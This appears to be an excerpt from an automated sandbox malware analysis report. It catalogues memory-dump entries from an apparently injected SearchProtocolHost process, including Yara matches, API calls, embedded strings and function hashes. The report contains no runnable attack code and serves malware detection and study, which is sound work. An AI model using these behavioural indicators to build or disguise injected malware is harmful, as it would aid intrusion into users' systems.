                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: b858a77b5af68b72458b4b94b1d301383683a3cfe8d553f5d59c350910467108
                                                    • Instruction ID: 2943498015d0b3b7231db3fa262e476ed2d2f9d6a1548dbb30397f8d01c1fd2c
                                                    • Opcode Fuzzy Hash: b858a77b5af68b72458b4b94b1d301383683a3cfe8d553f5d59c350910467108
                                                    • Instruction Fuzzy Hash: C3900261342445525545F15858045074046A7E0251799C012A9414A51C86269956D621
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 7804d52cd8af4a49cf7c4534a0d3d0ddd3838fe3e838b018c0ebdf49969775af
                                                    • Instruction ID: 2b909a80c51521b629e017ec9013ef1cd449e1ffedd987717e86e185501cdfb6
                                                    • Opcode Fuzzy Hash: 7804d52cd8af4a49cf7c4534a0d3d0ddd3838fe3e838b018c0ebdf49969775af
                                                    • Instruction Fuzzy Hash: FE90027130140813D111B1585904707004997D0251F99C412A8424659D97568A52A121
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: f6dbf033be7adc76a9ab6e8b5dfc42b82d2a4e0751c63dbf9e8abff8703375b5
                                                    • Instruction ID: 273f90de64573d8a4e36e1105b95af59361936c50999a74878b1ac7d3b730675
                                                    • Opcode Fuzzy Hash: f6dbf033be7adc76a9ab6e8b5dfc42b82d2a4e0751c63dbf9e8abff8703375b5
                                                    • Instruction Fuzzy Hash: 6890027130148C02D110B158980474A004597D0311F5DC411AC424759D879589917121
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 71292bd07cf06566b053a94928ebe434c0ec6880c7aa66bf2addc50bf26e9e1c
                                                    • Instruction ID: d9bd7812734bab54ad0ac62e028b51348c5f1dfcaca3a0efec73ab0a043958d2
                                                    • Opcode Fuzzy Hash: 71292bd07cf06566b053a94928ebe434c0ec6880c7aa66bf2addc50bf26e9e1c
                                                    • Instruction Fuzzy Hash: 8D90027130140C42D100B1585804B46004597E0311F59C016A8124755D8715C9517521
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: a7f1540160e3b7c99dfbda94cee6b4c3ea4f86f3dfa5aab11f24c058fe7619d8
                                                    • Instruction ID: f44e798f877b463499196c5670ac7dfd06a7bc604ba5f8cb79e732fcd0871c4b
                                                    • Opcode Fuzzy Hash: a7f1540160e3b7c99dfbda94cee6b4c3ea4f86f3dfa5aab11f24c058fe7619d8
                                                    • Instruction Fuzzy Hash: EA90027130140802D100B5986808646004597E0311F59D011AD024656EC76589916131
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 49ff05668172f7ef967d6341fb7c37d8442b2d81d64fd586bef162d91b7da136
                                                    • Instruction ID: b663b08023e6899beb440b1be5f2d5e2aca1ce85fbb09f870d821fccaa41f2d2
                                                    • Opcode Fuzzy Hash: 49ff05668172f7ef967d6341fb7c37d8442b2d81d64fd586bef162d91b7da136
                                                    • Instruction Fuzzy Hash: 0D90027170550802D100B1585914706104597D0211F69C411A8424669D87958A5165A2
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 10be00ad5f827346f50aef45d7b75544cbc7e2d1e3cbbbe013274dc77c044eef
                                                    • Instruction ID: 738dd54e6432c7ad64b6b434e5736c43beaffcf2854f3f8ce268f21c2c3a291a
                                                    • Opcode Fuzzy Hash: 10be00ad5f827346f50aef45d7b75544cbc7e2d1e3cbbbe013274dc77c044eef
                                                    • Instruction Fuzzy Hash: 1A90026134545502D150B15C58046164045B7E0211F59C021A8814695D865589556221

                                                    Control-flow Graph: function 9f1098-9f110e (calls a0b810, a0c220, 9f4820, 9e13f0, a01e20), then PostThreadMessageW at 9f1110-9f1121; exits via 9f1123-9f112d to 9f1130-9f1135
                                                    APIs
                                                    • PostThreadMessageW.USER32(sE716IK71M,00000111,00000000,00000000), ref: 009F111D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: sE716IK71M$sE716IK71M
                                                    • API String ID: 1836367815-922563818
                                                    • Opcode ID: b45cae07c9c219c099e0826546d53defafec1ad3bdbe238061a0a9cc026b5f1f
                                                    • Instruction ID: 1c8132204211ec74bb932501c82c7e46dee89ac6451c595af6a50f90e49979e7
                                                    • Opcode Fuzzy Hash: b45cae07c9c219c099e0826546d53defafec1ad3bdbe238061a0a9cc026b5f1f
                                                    • Instruction Fuzzy Hash: 0A110431E4025C76EB21ABA09C42FEF7B7C9F41790F008054FB047B2C1D6786A068BE1

                                                    Control-flow Graph: function 9f10a0-9f10b0, optional call a0b810 at 9f10b4, then 9f10b9-9f110e (calls a0c220, 9f4820, 9e13f0, a01e20), then PostThreadMessageW at 9f1110-9f1121; exits via 9f1123-9f112d to 9f1130-9f1135
                                                    APIs
                                                    • PostThreadMessageW.USER32(sE716IK71M,00000111,00000000,00000000), ref: 009F111D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: sE716IK71M$sE716IK71M
                                                    • API String ID: 1836367815-922563818
                                                    • Opcode ID: 3de012e5431b6b67fac50700b1926275c7c37100b9222c36437f17da7e8deb27
                                                    • Instruction ID: 4db1d99dcc6bfcdabb1a671c44a91581f5499ea3020570dcd774b7bcbf27532e
                                                    • Opcode Fuzzy Hash: 3de012e5431b6b67fac50700b1926275c7c37100b9222c36437f17da7e8deb27
                                                    • Instruction Fuzzy Hash: A5019671E4121C76EB21A7A49D02FEF7B7C9F45B90F048054FB047B1C1E6786A068BE5
                                                    APIs
                                                    • Sleep.KERNELBASE(000007D0), ref: 00A03D1B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID: net.dll$wininet.dll
                                                    • API String ID: 3472027048-1269752229
                                                    • Opcode ID: bd11e206bd162b61418908fde7cc6af85e48e0b7f9bbc4e4d4f4751761957dee
                                                    • Instruction ID: 7fb2c533f1bd7166bafaafc4e947f8da1cc7c97b7c0fa83bb2f79f6e6aa17117
                                                    • Opcode Fuzzy Hash: bd11e206bd162b61418908fde7cc6af85e48e0b7f9bbc4e4d4f4751761957dee
                                                    • Instruction Fuzzy Hash: 6131C571A00609BBD714EFA4DC81FEBBBB8EB88310F10451DF61D9B281D3706640CBA1
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InitializeUninitialize
                                                    • String ID: @J7<
                                                    • API String ID: 3442037557-2016760708
                                                    • Opcode ID: a011dada001af0ab0cd32fa7fc1d6a62eca248bead56f5f1d02a8c9b41a19f63
                                                    • Instruction ID: df3199f7d6853f5b8315e3f079c55cb611c4602481673035ee72d65269e70a56
                                                    • Opcode Fuzzy Hash: a011dada001af0ab0cd32fa7fc1d6a62eca248bead56f5f1d02a8c9b41a19f63
                                                    • Instruction Fuzzy Hash: FE311076A0060E9FDB00DFD8D8809EFB7B9BF88304B108569E605AB354D775AE058BA0
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InitializeUninitialize
                                                    • String ID: @J7<
                                                    • API String ID: 3442037557-2016760708
                                                    • Opcode ID: ae9313da7f161ffccb725217d098db47be51ac62604412dc9d09675bbe1d632d
                                                    • Instruction ID: 3a969c2b8c8cc61d1578e979e1d6b0a500de9c06055c3cfd839d502f2e48946f
                                                    • Opcode Fuzzy Hash: ae9313da7f161ffccb725217d098db47be51ac62604412dc9d09675bbe1d632d
                                                    • Instruction Fuzzy Hash: 253110B6A0060E9FDB00DFD8D8809EFB7B9BF88304B108559E615EB354D775EE458BA0
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 009F4892
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: a74df69d41897592aaf7166ddb8974ec87685279e0badbf6da0a133babb8fc0f
                                                    • Instruction ID: cf5887e13d74f5deede209f793d7d6732d528e31db1e9d38fdc518caf6fbb032
                                                    • Opcode Fuzzy Hash: a74df69d41897592aaf7166ddb8974ec87685279e0badbf6da0a133babb8fc0f
                                                    • Instruction Fuzzy Hash: 9421447254864E9BCB01DEF8DC41BF6B764CF45324F104798DDACEB1D1EA215D018782
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 009F4892
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 1fd0e5ac93c599581ea8bd70fbed3e05817cf44cc4c3a5592a884bcc08fa010a
                                                    • Instruction ID: 49d2bfe3058a7760ba915dff02c11b1b805a58c6455c095548a9f7abd034602d
                                                    • Opcode Fuzzy Hash: 1fd0e5ac93c599581ea8bd70fbed3e05817cf44cc4c3a5592a884bcc08fa010a
                                                    • Instruction Fuzzy Hash: 0E01B5B5E4010DABDF10DBA0EC42FAEB7789B14318F0042A8EA189B2C1F631E715C791
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 009F4892
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_9e0000_SearchProtocolHost.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                    • API String ID: 0-2474120054
                                                    • Opcode ID: f250a51b90c16aee51506fcd5a97c8c3a3515b8282c45b88447a0a6a30fcc3b5
                                                    • Instruction ID: 2002a936872b4638de56d7b0bdd328ef6ffd569e5f7f5f3c531870fc699dec01
                                                    • Opcode Fuzzy Hash: f250a51b90c16aee51506fcd5a97c8c3a3515b8282c45b88447a0a6a30fcc3b5
                                                    • Instruction Fuzzy Hash: 45E1B031A04742AFD725DF28E884B2AB7E0BF85324F180A5DF5A59B2F1D774D849CB42
                                                    Strings
                                                    • RTL: Resource at %p, xrefs: 03587B8E
                                                    • RTL: Re-Waiting, xrefs: 03587BAC
                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03587B7F
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 0-871070163
                                                    • Opcode ID: 994dc34c04e33b8d27041396184e8ea52807bc82497662b30e6b5a2778b71c79
                                                    • Instruction ID: 9f594470251e3a5f4818d3b1f68665946fcda7ae331bcf104bad340655bfe32b
                                                    • Opcode Fuzzy Hash: 994dc34c04e33b8d27041396184e8ea52807bc82497662b30e6b5a2778b71c79
                                                    • Instruction Fuzzy Hash: 9441E5353007029FDB28DF29E840B6AB7E5FF88715F140A1DF99ADB2A0D771E8058B91
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0358728C
                                                    Strings
                                                    • RTL: Resource at %p, xrefs: 035872A3
                                                    • RTL: Re-Waiting, xrefs: 035872C1
                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03587294
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-605551621
                                                    • Opcode ID: f42baad3aac6c955b08124bbfdb0e33ad54b19e24d1bbabc4b0aa1711aa382fa
                                                    • Instruction ID: 920b163563193952e6ecb491b069020a6652ee94115aa71b35feeda7f3410a5c
                                                    • Opcode Fuzzy Hash: f42baad3aac6c955b08124bbfdb0e33ad54b19e24d1bbabc4b0aa1711aa382fa
                                                    • Instruction Fuzzy Hash: 5841D435600206ABDB14EF25EC41F6AB7A5FB88714F240A19F996EB260DB21F85187D1
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$]:%u
                                                    • API String ID: 48624451-3050659472
                                                    • Opcode ID: 4e8f74406a4b75d431646ab20cf55c8ef18856bc5ec01db9685af25ddf4d41c6
                                                    • Instruction ID: 7a97f8a5b7c2096bd55cf30900e0d2d4c57e8c06fb3916d46a923a53412bf6e9
                                                    • Opcode Fuzzy Hash: 4e8f74406a4b75d431646ab20cf55c8ef18856bc5ec01db9685af25ddf4d41c6
                                                    • Instruction Fuzzy Hash: 8B318876A102599FCF20DE69EC50BEEB7B8FF44614F44459AE849D7150EB30AA44CBA0
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-
                                                    • API String ID: 1302938615-2137968064
                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                    • Instruction ID: e0a79807dcf5fc3c0e6d2db612cb5cd43b41e4d45c071ed910a50b69d5832cbc
                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                    • Instruction Fuzzy Hash: 0591B271E003169BDB24DE69E8A06BEB7B5BF88320F58455BFC65E72E0D730B9408750
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $$@
                                                    • API String ID: 0-1194432280
                                                    • Opcode ID: 6cc419e474305dcf35192570b57e33204db5c2d61c488c9bcb1595ca07d857d5
                                                    • Instruction ID: 747440f7d872b370f00c8587ca826765fed4a736dce0726fa149ba7b7c54016e
                                                    • Opcode Fuzzy Hash: 6cc419e474305dcf35192570b57e33204db5c2d61c488c9bcb1595ca07d857d5
                                                    • Instruction Fuzzy Hash: 1E814B75D002699BDB35DB54EC44BEEB7B8BF48710F0445DAA919B7290E7309E84CFA0
                                                    APIs
                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 0359CFBD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                    • Associated: 00000009.00000002.2821709960.0000000003609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000360D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_34e0000_SearchProtocolHost.jbxd
                                                    Similarity
                                                    • API ID: CallFilterFunc@8
                                                    • String ID: @$@4Qw@4Qw
                                                    • API String ID: 4062629308-2383119779
                                                    • Opcode ID: 085ff5fa1f16b2091af7a2239815f91bd8c0b81172b7923b1b96f785c734db90
                                                    • Instruction ID: 800f200fce1c1b79342b05cdf4c1be63006b659775ba1685f185210e67d32dd7
                                                    • Opcode Fuzzy Hash: 085ff5fa1f16b2091af7a2239815f91bd8c0b81172b7923b1b96f785c734db90
                                                    • Instruction Fuzzy Hash: 1E418E79A00225DFDB21DFA5E840A6EBBF8FF85B04F15442AE914DF2A4E734D801CB60